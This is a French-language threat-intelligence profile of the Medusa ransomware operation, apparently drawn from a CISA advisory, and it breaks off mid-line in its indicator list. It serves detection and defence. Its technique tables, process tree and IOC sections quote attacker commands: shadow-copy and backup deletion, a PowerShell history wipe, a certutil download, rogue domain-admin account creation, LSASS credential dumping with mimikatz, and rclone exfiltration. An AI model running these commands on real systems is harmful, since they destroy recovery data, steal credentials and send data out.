# Medusa Ransomware Ransomware en tant que service · Observé pour la première fois en juin 2021 ## Présentation Medusa est une opération de ransomware en tant que service observée pour la première fois en juin 2021. Elle applique un modèle de double extorsion : les affiliés chiffrent les systèmes des victimes tandis que le groupe principal exfiltre simultanément les données sensibles. Les victimes qui refusent de payer s’exposent à la publication de leurs données sur Medusa Blog, un site de fuite hébergé sur Tor dont le compte à rebours est visible par tous. Selon CISA AA25-071A, les rançons demandées vont de 100 000 à 15 millions de dollars selon la taille de la victime. Le groupe ne doit pas être confondu avec la famille de ransomware MedusaLocker, une variante distincte et plus ancienne, ni avec le cheval de Troie bancaire Android Medusa. Le RaaS visant Windows traité ici a suscité une attention importante après la publication d’un [avis conjoint CISA/FBI/MS-ISAC (AA25-071A) publié le 12 mars 2025](https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a), qui recense plus de 300 victimes dans les secteurs de la santé, de l’enseignement, du droit, de l’assurance, de la technologie et de l’industrie. [Microsoft Threat Intelligence a signalé en avril 2026](https://www.microsoft.com/en-us/security/blog/2026/04/06/storm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations/) que Storm-1175 avait déployé le ransomware Medusa dans le cadre d’opérations à rythme soutenu ciblant des systèmes Web vulnérables. Dans certains cas, moins de 24 heures se sont écoulées entre l’exploitation réussie, l’exfiltration des données et le déploiement du ransomware. Les affiliés Medusa obtiennent principalement l’accès initial au moyen de campagnes d’hameçonnage et de l’exploitation de services exposés à Internet non corrigés. La CISA indique que le groupe exploite [ConnectWise ScreenConnect CVE-2024-1709](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) (contournement de l’authentification) et CVE-2023-48788, une injection SQL dans Fortinet EMS, toutes deux fréquentes dans les intrusions observées. Une part importante des accès est achetée à des courtiers en accès initial, activement recrutés par les développeurs de Medusa sur des forums cybercriminels avec des offres allant de 100 à 1 million de dollars par accès. Après avoir établi une présence, les affiliés consacrent du temps à la reconnaissance interne et au mouvement latéral avant de déployer la charge utile du ransomware. Le contournement des défenses repose sur une attaque Bring Your Own Vulnerable Driver (BYOVD) utilisant un pilote personnalisé signé, ABYSSWORKER, afin de désactiver la détection sur les terminaux, ainsi que sur la suppression de l’historique des commandes PowerShell. La charge utile — un binaire nommé `gaze.exe` d’après l’enquête de la CISA — utilise AES-256 pour chiffrer les fichiers. Avant le chiffrement, `gaze.exe` arrête les services liés aux sauvegardes, à la sécurité, aux bases de données, aux communications, au partage de fichiers et aux sites Web, puis supprime les clichés instantanés des volumes. Chaque fichier chiffré reçoit l’extension `.medusa` et une note de rançon (`!!!READ_ME_MEDUSA!!!.txt`) est déposée dans chaque répertoire affecté. Les victimes disposent de 48 heures pour prendre contact via un chat en direct sur Tor ou la messagerie chiffrée de bout en bout Tox ; celles qui ne répondent pas sont relancées directement par téléphone ou e-mail. Le site de fuite `.onion` de Medusa affiche un compte à rebours ; les victimes peuvent payer 10 000 $ en cryptomonnaie pour y ajouter une journée. ### Profil de la menace Mis à jour le 18 juin 2026 | Type | Première observation | Modèle | Chiffrement | |---|---|---|---| | Ransomware (RaaS) | Juin 2021 | Double extorsion | AES-256 | | Détail | Valeur | |---|---| | Alias | Medusa Blog, Medusa RaaS (distinct de MedusaLocker) | | Binaire de chiffrement | `gaze.exe` | | Extension de fichier | `.medusa` | | Note de rançon | `!!!READ_ME_MEDUSA!!!.txt` | | Vecteurs d’accès | Hameçonnage · CVE n-day · accès acheté auprès de courtiers en accès initial | | Contournement | ABYSSWORKER BYOVD · suppression VSS · effacement de l’historique PowerShell · LOLBins | | Outil d’exfiltration | Rclone vers les serveurs C2 contrôlés par l’acteur | | Canaux de contact | Chat Tor en direct · messagerie Tox · délai de 48 h | | Cibles principales | Santé, enseignement, droit, assurance, technologie, industrie | ## Chaîne d’attaque opérationnelle 1. **Départ — Accès initial** - Hameçonnage · RDP · achat auprès d’un courtier en accès initial 2. **Étape 1 — Reconnaissance et persistance** - Scanners réseau · création de comptes de domaine 3. **Étape 2 — Contournement des défenses** - ABYSSWORKER BYOVD · suppression VSS · effacement de l’historique 4. **Étape 3 — Mouvement latéral** - RDP · PsExec · outils RMM - T1021.001 · T1569.002 5. **Étape 4 — Exfiltration des données** - Rclone → serveurs C2 de Medusa 6. **Étape 5 — Chiffrement** - `gaze.exe` · AES-256 · extension `.medusa` 7. **Impact — Double extorsion** - Site de fuite Tor + compte à rebours ## Tactiques, techniques et procédures Couverture du cadre MITRE ATT&CK Enterprise sur l’ensemble de la chaîne d’attaque Medusa. Les lignes mises en évidence correspondent aux tactiques dans lesquelles Medusa présente un comportement distinctif ou à fort impact. ### Couverture MITRE ATT&CK | Tactique | Techniques observées | |---|---:| | Reconnaissance | 0 | | Développement des ressources | 0 | | Accès initial | 2 | | Exécution | 3 | | Persistance | 1 | | Élévation de privilèges | 0 | | Contournement des défenses | 4 | | Accès aux identifiants | 2 | | Découverte | 5 | | Mouvement latéral | 4 | | Collecte | 1 | | Commande et contrôle | 2 | | Exfiltration | 1 | | Impact | 5 | ### Détail des techniques | Tactique | Techniques | Remarques | |---|---|---| | Accès initial | [Hameçonnage T1566](https://attack.mitre.org/techniques/T1566/) · [Exploitation d’une application exposée T1190](https://attack.mitre.org/techniques/T1190/) | Selon la CISA : campagnes d’hameçonnage visant le vol d’identifiants, ainsi que l’exploitation de [ConnectWise ScreenConnect CVE-2024-1709](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) (contournement de l’authentification, CWE-288) et de l’injection SQL Fortinet EMS CVE-2023-48788. Les développeurs de Medusa recrutent activement des courtiers en accès initial (IAB) sur des forums cybercriminels, avec des offres allant de 100 dollars à 1 million de dollars par accès. | | Exécution | [PowerShell T1059.001](https://attack.mitre.org/techniques/T1059/001/) · [Interpréteur de commandes Windows T1059.003](https://attack.mitre.org/techniques/T1059/003/) · [Outils de déploiement logiciel T1072](https://attack.mitre.org/techniques/T1072/) | PowerShell est utilisé tout au long de l’attaque pour la préparation, l’énumération et la distribution des charges utiles. PsExec et WMIC servent à exécuter des commandes sur des hôtes distants. Des outils RMM légitimes (PDQ Deploy, ConnectWise) sont détournés pour la distribution latérale. | | Persistance | [Création d’un compte de domaine T1136.002](https://attack.mitre.org/techniques/T1136/002/) | La CISA indique que Medusa crée des comptes de domaine afin de conserver l’accès. Les commandes observées comprennent `net user /add default /domain`, puis l’ajout aux groupes Domain Admins, Enterprise Admins et Remote Desktop Users. | | Contournement des défenses | [Désactivation des outils de sécurité T1562.001](https://attack.mitre.org/techniques/T1562/001/) · [Rootkit / BYOVD T1014](https://attack.mitre.org/techniques/T1014/) · [Effacement de l’historique des commandes T1070.003](https://attack.mitre.org/techniques/T1070/003/) · [Fichier chiffré/encodé T1027.013](https://attack.mitre.org/techniques/T1027/013/) | Un pilote noyau signé (ABYSSWORKER / `smuol.sys`) est chargé pour arrêter les processus EDR au niveau ring 0. L’historique des commandes PowerShell est effacé au moyen de `Remove-Item (Get-PSReadlineOption).HistorySavePath`. Les charges utiles PowerShell sont obscurcies par encodage base64, concaténation de chaînes et blocs de script en mémoire compressés avec gzip. Les clichés instantanés des volumes sont supprimés avec `vssadmin.exe Delete Shadows /all /quiet`, technique classée dans Impact sous T1490. `certutil -f urlcache` sert à faire entrer les fichiers. | | Accès aux identifiants | [Extraction de la mémoire LSASS T1003.001](https://attack.mitre.org/techniques/T1003/001/) · [Attaque par force brute sur les mots de passe T1110.001](https://attack.mitre.org/techniques/T1110/001/) | Mimikatz ou des outils similaires servent à récupérer les hachages NTLM et tickets Kerberos dans la mémoire de LSASS, ce qui permet le mouvement latéral par pass-the-hash et pass-the-ticket sans casser les mots de passe. | | Découverte | [Découverte des services réseau T1046](https://attack.mitre.org/techniques/T1046/) · [Découverte des partages réseau T1135](https://attack.mitre.org/techniques/T1135/) · [Découverte de fichiers T1083](https://attack.mitre.org/techniques/T1083/) · [Groupes de domaine T1069.002](https://attack.mitre.org/techniques/T1069/002/) · [Informations système T1082](https://attack.mitre.org/techniques/T1082/) | Advanced IP Scanner et SoftPerfect Network Scanner servent à l’énumération du réseau. Des commandes Windows natives (`net share`, `net group "domain admins" /domain`, `nltest /dclist:`, `systeminfo`) complètent l’analyse. Les ports fréquemment analysés comprennent 21, 22, 23, 80, 115, 443, 1433, 3050, 3128, 3306 et 3389. | | Mouvement latéral | [RDP T1021.001](https://attack.mitre.org/techniques/T1021/001/) · [Services système / PsExec T1569.002](https://attack.mitre.org/techniques/T1569/002/) · [Logiciels d’accès à distance T1219](https://attack.mitre.org/techniques/T1219/) · [Outils de déploiement logiciel T1072](https://attack.mitre.org/techniques/T1072/) | RDP est activé à l’échelle du cluster au moyen de `openrdp.bat`, qui crée une règle de pare-feu pour le port 3389, active WMI et définit `fDenyTSConnections=0`. PsExec copie et exécute des scripts batch en tant que SYSTEM. Les affiliés exploitent également les outils RMM déjà présents dans l’environnement de la victime — AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Inventory, SimpleHelp et Splashtop — afin de se fondre dans l’activité normale. PDQ Deploy et BigFix servent à distribuer le binaire de chiffrement dans le domaine. T1072 figure aussi sous Exécution ; Medusa utilise les outils de déploiement à la fois pour l’exécution de commandes à distance et la distribution latérale du binaire de chiffrement. | | Collecte | [Données des lecteurs partagés réseau T1039](https://attack.mitre.org/techniques/T1039/) | Les partages réseau, serveurs de fichiers et référentiels de sauvegarde sont énumérés et ciblés. Les documents sensibles, données financières, informations personnelles, identifiants et autres contenus à fort pouvoir d’extorsion sont prioritaires. | | Commande et contrôle | [Protocoles Web T1071.001](https://attack.mitre.org/techniques/T1071/001/) · [Transfert d’outils entrant T1105](https://attack.mitre.org/techniques/T1105/) | Shells inverses ou en écoute sur le port 443 (HTTPS) au moyen du stager open source `powerfun.ps1`. Ligolo sert au tunneling inverse ; Cloudflared, anciennement ArgoTunnel, expose les services internes via Cloudflare Tunnel sans exposition directe. | | Exfiltration | [Exfiltration vers le stockage cloud T1567.002](https://attack.mitre.org/techniques/T1567/002/) | La CISA indique que Rclone exfiltre les données vers les serveurs C2 de Medusa (T1567.002). L’exfiltration précède le chiffrement : le levier de double extorsion est établi avant que la victime ne prenne conscience de la compromission. | | Impact | [Données chiffrées pour l’impact T1486](https://attack.mitre.org/techniques/T1486/) · [Vol financier / extorsion T1657](https://attack.mitre.org/techniques/T1657/) · [Inhibition de la récupération du système T1490](https://attack.mitre.org/techniques/T1490/) · [Arrêt de service T1489](https://attack.mitre.org/techniques/T1489/) · [Arrêt/redémarrage du système T1529](https://attack.mitre.org/techniques/T1529/) | AES-256 chiffre le contenu des fichiers. Les fichiers chiffrés reçoivent l’extension `.medusa`. Une note de rançon est déposée dans chaque répertoire. Les clichés instantanés et sauvegardes sont supprimés au préalable. Avant le chiffrement, `gaze.exe` arrête les services liés aux sauvegardes, à la sécurité, aux bases de données, aux communications, au partage de fichiers et aux sites Web (T1489). Après le chiffrement, les acteurs arrêtent et chiffrent manuellement les machines virtuelles (T1529). Les victimes subissent simultanément le chiffrement et la menace de publication des données sur un site de fuite Tor. | ### Étape 1 : Accès initial et prise de pied *T1566 · T1190* La CISA documente deux principaux modèles d’accès initial pour Medusa. Le premier consiste en des **campagnes d’hameçonnage** menées par des courtiers en accès initial afin de voler les identifiants des victimes. Le second repose sur **l’exploitation d’applications exposées à Internet et non corrigées** ; l’avis cite précisément [ConnectWise ScreenConnect CVE-2024-1709](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) (un contournement de l’authentification, CWE-288) et l’injection SQL CVE-2023-48788 dans Fortinet EMS (CWE-89). Une part importante des intrusions Medusa commence par l’achat d’un accès plutôt que par une compromission directe. Les développeurs de Medusa recrutent activement des courtiers en accès initial sur des forums et places de marché cybercriminels, en proposant de 100 à 1 million de dollars par accès, avec la possibilité de travailler exclusivement pour Medusa. Ainsi, lorsque l’activité Medusa devient détectable, l’intrusion initiale peut avoir été réalisée plusieurs semaines ou mois auparavant par un autre acteur. ### Étape 2 : Reconnaissance et persistance *T1046 · T1135 · T1069.002 · T1082 · T1136.002* Après avoir établi une présence, les acteurs Medusa utilisent à la fois des outils d’analyse légitimes et des commandes Windows natives pour l’énumération. La CISA cite **Advanced IP Scanner** et **SoftPerfect Network Scanner** comme principaux outils de découverte. Des commandes natives complètent ces outils : `net share` pour les lecteurs partagés, `net group "domain admins" /domain` pour les comptes à forte valeur, `nltest /dclist:` pour énumérer les contrôleurs de domaine et `systeminfo` pour relever l’empreinte de l’hôte. Les ports fréquemment analysés comprennent 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP), 115 (SFTP), 443 (HTTPS), 1433 (SQL), 3050 (Firebird), 3128 (proxy HTTP), 3306 (MySQL) et 3389 (RDP). La persistance est établie par la création de **comptes de domaine**. La CISA documente les commandes exactes : `net user /add default /domain`, puis l’ajout du compte aux groupes Domain Admins, Enterprise Admins, Remote Desktop Users, Group Policy Creator Owners et Schema Admins. Ces comptes non autorisés permettent aux affiliés de conserver l’accès même si le point d’entrée initial est fermé. ### Étape 3 : Contournement des défenses : BYOVD et suppression des indicateurs *T1562.001 · T1014 · T1070.003 · T1027.013* La technique de contournement la plus importante de Medusa sur le plan technique est Bring Your Own Vulnerable Driver (BYOVD). Des rapports de renseignement sur les menaces publiés en mars 2025 ont attribué aux intrusions Medusa un pilote noyau personnalisé signé nommé **ABYSSWORKER** (nom de fichier `smuol.sys`), déployé via un chargeur empaqueté avec le service HeartCrypt. Le pilote est signé à l’aide de certificats volés ou révoqués de fournisseurs chinois et conçu pour imiter un pilote EDR légitime signé, ce qui lui permet de se charger sur des systèmes qui rejetteraient normalement des composants noyau non signés ou inconnus. Une fois chargé au niveau ring 0, ABYSSWORKER sert à arrêter ou aveugler les agents EDR depuis le contexte du noyau, où la plupart des outils de sécurité de l’espace utilisateur ne peuvent ni observer ni intervenir. [Des artefacts ABYSSWORKER ont été observés sur VirusTotal entre août 2024 et février 2025.](https://thehackernews.com/2025/03/medusa-ransomware-uses-malicious-driver.html) La suppression des indicateurs vient ensuite. La CISA documente l’effacement par Medusa de **l’historique des lignes de commande PowerShell** au moyen de `Remove-Item (Get-PSReadlineOption).HistorySavePath`, ainsi que plusieurs modèles de contournement PowerShell : commandes encodées en base64 via `-enc`, chaînes découpées puis concaténées et blocs de script en mémoire compressés avec gzip. Les clichés instantanés des volumes sont supprimés au moyen de `vssadmin`. Le binaire de chiffrement `gaze.exe` arrête ensuite automatiquement les services liés aux sauvegardes, à la sécurité, aux bases de données, aux communications, au partage de fichiers et aux sites Web (T1489). #### Commandes de contournement des défenses documentées dans CISA AA25-071A (Annexe A) ```powershell powershell -exec bypass -enc powershell Remove-Item (Get-PSReadlineOption).HistorySavePath vssadmin.exe Delete Shadows /all /quiet cmd.exe /c certutil -f urlcache https:///.msi .msi reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf ``` Source : CISA AA25-071A, annexe A — Commandes Medusa ### Étape 4 : Mouvement latéral et exfiltration des données *T1021.001 · T1569.002 · T1219 · T1072 · T1567.002* Le mouvement latéral repose sur RDP, PsExec et les logiciels d’accès à distance déjà présents dans l’environnement de la victime. La CISA indique que les acteurs Medusa exploitent les outils RMM existants — notamment **AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Inventory, SimpleHelp et Splashtop** — afin de se fondre dans le trafic légitime des administrateurs. Le script batch `openrdp.bat` sert à ouvrir RDP à l’échelle du cluster : il ajoute une règle de pare-feu pour le port 3389, autorise les connexions WMI distantes et définit la valeur de registre `fDenyTSConnections` sur `0`. PsExec copie et exécute ensuite les charges utiles avec des privilèges de niveau SYSTEM. Mimikatz est utilisé pour extraire la mémoire de LSASS (T1003.001), récupérer des identifiants et faciliter le mouvement latéral. Le binaire de chiffrement `gaze.exe` est distribué dans le domaine au moyen de PsExec, PDQ Deploy ou BigFix immédiatement avant son déclenchement. L’exfiltration des données intervient *avant* le chiffrement, établissant le levier d’extorsion indépendamment de l’impact du chiffrement. La CISA confirme que les acteurs Medusa utilisent **Rclone pour exfiltrer les données vers leurs propres serveurs C2**, et non vers un stockage cloud tiers. Pour l’infrastructure de commande et contrôle, la CISA documente aussi l’utilisation de **Ligolo**, un outil de tunneling inverse, et de **Cloudflared**, anciennement ArgoTunnel, afin d’exposer de manière sécurisée les ressources de la victime à l’infrastructure de l’attaquant. - `openrdp.bat` (MD5 : `44370f5c977e415981febf7dbb87a85c` selon la CISA) — IOC durable pour l’activation de RDP - `pu.exe` (MD5 : `80d852cd199ac923205b61658a9ec5bc`) — shell inverse, identifié dans le tableau 1 de la CISA - Le script de stager open source `powerfun.ps1` sert à créer des shells TLS inverses ou en écoute sur le port 443 ### Étape 5 : Chiffrement et double extorsion *T1486 · T1657 · T1489 · T1490 · T1529* Le binaire de chiffrement du ransomware Medusa est nommé `gaze.exe` d’après l’enquête de la CISA. Il est déployé sur le réseau au moyen de Sysinternals PsExec, PDQ Deploy ou BigFix, les services antivirus et de protection des terminaux étant désactivés sur certaines cibles avant son déclenchement. Les fichiers chiffrés reçoivent l’extension `.medusa` ; la note de rançon `!!!READ_ME_MEDUSA!!!.txt` est écrite dans chaque répertoire parcouru. La séquence de chiffrement est documentée par la CISA : `gaze.exe` arrête tous les services liés aux sauvegardes, à la sécurité, aux bases de données, aux communications, au partage de fichiers et aux sites Web (T1489), supprime ensuite les clichés instantanés (T1490), puis chiffre les fichiers avec AES-256 avant de déposer la note de rançon. Après le chiffrement, les acteurs arrêtent et chiffrent manuellement les machines virtuelles (T1529), puis suppriment les outils installés afin d’entraver la reconstitution forensique. Les victimes disposent de 48 heures pour prendre contact via un chat en direct sur Tor ou **Tox**, une plateforme de messagerie instantanée chiffrée de bout en bout. En l’absence de réponse, les acteurs Medusa les contactent directement par téléphone ou e-mail ; le tableau 2 de la CISA répertorie cinq adresses d’extorsion utilisées pour la négociation, notamment `key.medusa.serviceteam@protonmail.com` et `MedusaSupport@cock.li`. Le site de fuite `.onion` de Medusa affiche les victimes avec des comptes à rebours ; les données sont simultanément proposées à la vente à des tiers intéressés avant l’expiration du délai. Les victimes peuvent payer **10 000 USD en cryptomonnaie pour ajouter une journée au compte à rebours.** La CISA documente également un modèle de triple extorsion observé dans au moins un cas : après le paiement de la rançon, une victime a été contactée par un autre acteur Medusa affirmant que le négociateur initial avait volé les fonds et exigeant la moitié de la somme une seconde fois pour fournir le « véritable outil de déchiffrement ». ### Arborescence des processus #### Aspect de la chaîne d’attaque Medusa dans la télémétrie EDR ```text svchost.exe [PID 984] // normal Windows service └─ powershell.exe [PID 3412] -exec bypass -enc [base64] [Encoded command · T1027.013] └─ powershell.exe Remove-Item (Get-PSReadlineOption).HistorySavePath [History wipe · T1070.003] └─ advanced_ip_scanner.exe network sweep across /16 [Recon · T1046] └─ mimikatz.exe [PID 5120] sekurlsa::logonpasswords [LSASS dump · T1003.001] └─ sc.exe [PID 5340] create [svc] binPath= smuol.sys [ABYSSWORKER BYOVD · T1014] psexec.exe -accepteula -s \\ -c openrdp.bat [Lateral · T1569.002] └─ netsh.exe advfirewall firewall add rule "rdp" port 3389 └─ reg.exe add ...Terminal Server /v fDenyTSConnections /d 0 rclone.exe [PID 7700] copy remote:exfil --config rclone.conf [Exfil to C2 · T1567.002] gaze.exe [PID 8900] deployed via PsExec / PDQ Deploy / BigFix [Ransomware · T1486] └─ [terminates services] backup, security, DB, comms, fileshare, web [T1489] └─ vssadmin.exe Delete Shadows /all /quiet [Inhibit recovery · T1490] └─ [encrypts files AES-256] → .medusa ext + !!!READ_ME_MEDUSA!!!.txt ``` - Suspicious - Malicious - Critical / ransomware ## Indicateurs de compromission IOC comportementaux durables : chemins de fichiers, clés de registre, modèles de processus et comportements réseau cohérents d’une campagne Medusa à l’autre. Ils résistent mieux aux changements de variante que les indicateurs fondés sur les hachages. ### Chemins de fichiers et binaires Noms de fichiers et emplacements documentés dans CISA AA25-071A et dans les rapports de renseignement sur les menaces ultérieurs. - `gaze.exe` — Medusa encryptor binary (CISA-confirmed) - `smuol.sys` — ABYSSWORKER kernel driver - mimics a signed EDR driver; signed with stolen Chinese vendor certs - `openrdp.bat` — RDP enablement script - MD5 44370f5c977e415981febf7dbb87a85c - `pu.exe` — Reverse shell - MD5 80d852cd199ac923205b61658a9ec5bc - `!!!READ_ME_MEDUSA!!!.txt` — Ransom note dropped in all encrypted directories - `[filename].medusa` — Encrypted file extension - `\\\sysvol\gaze.exe` — Staging location observed on domain controllers ### Artefacts de registre et de comptes Modifications de registre et de comptes documentées dans l’annexe A de CISA AA25-071A. - `HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0` — Restricted Admin mode disabled to allow credential-relay over RDP - `HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections = 0` — RDP enabled via openrdp.bat - `HKLM\SYSTEM\CurrentControlSet\Services\[svc]` — Service registration for the ABYSSWORKER kernel driver (smuol.sys) - `net user /add default /domain` — Rogue domain account creation; followed by Domain Admins group addition ### Comportements des processus Modèles comportementaux issus de l’annexe A de la CISA — ces combinaisons sont rarement légitimes. - `vssadmin.exe Delete Shadows /all /quiet` — VSS deletion - direct CISA-confirmed Medusa command - `powershell Remove-Item (Get-PSReadlineOption).HistorySavePath` — PowerShell command history deletion - `certutil -f urlcache https:///.msi` — Living-off-the-land file ingress via certutil - `psexec.exe -accepteula -s \\ -c